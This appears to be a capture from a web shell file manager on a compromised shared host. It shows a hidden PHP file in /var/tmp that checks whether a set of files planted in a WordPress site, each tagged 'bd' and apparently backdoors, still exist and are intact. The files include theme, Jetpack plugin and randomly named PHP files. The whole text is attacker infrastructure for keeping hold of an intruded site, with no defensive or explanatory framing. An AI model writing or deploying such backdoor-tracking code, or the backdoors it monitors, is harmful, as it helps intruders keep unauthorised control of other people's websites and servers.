HEX
Server: Apache
System: Linux pdx1-shared-a2-01 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: dh_mhscom (5469217)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //var/tmp/.accept
<?php   $r = '/home/realindarien/realindarien.com'; $x = ["/index.php"=>"bd@@1447170@@405",
"/wp-content/themes/twentythirteen/author.php"=>"bd@@397392@@_COOKIE[3]",
"/wp-content/plugins/jetpack/3rd-party/wpcom-reader.php"=>"bd@@411488@@Content-Security-Policy",
"/6a8039.php"=>"bd@@66412@@105",
"/wp-content/plugins/jetpack/_inc/build/widgets/gallery/js/gallery.min.asset.php"=>"bd@@563337@@849",
"/index.php"=>"bd@@563856@@405",
"/wp-content/themes/comment-section-1748027133/4O4.php"=>"bd@@262341@@727"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');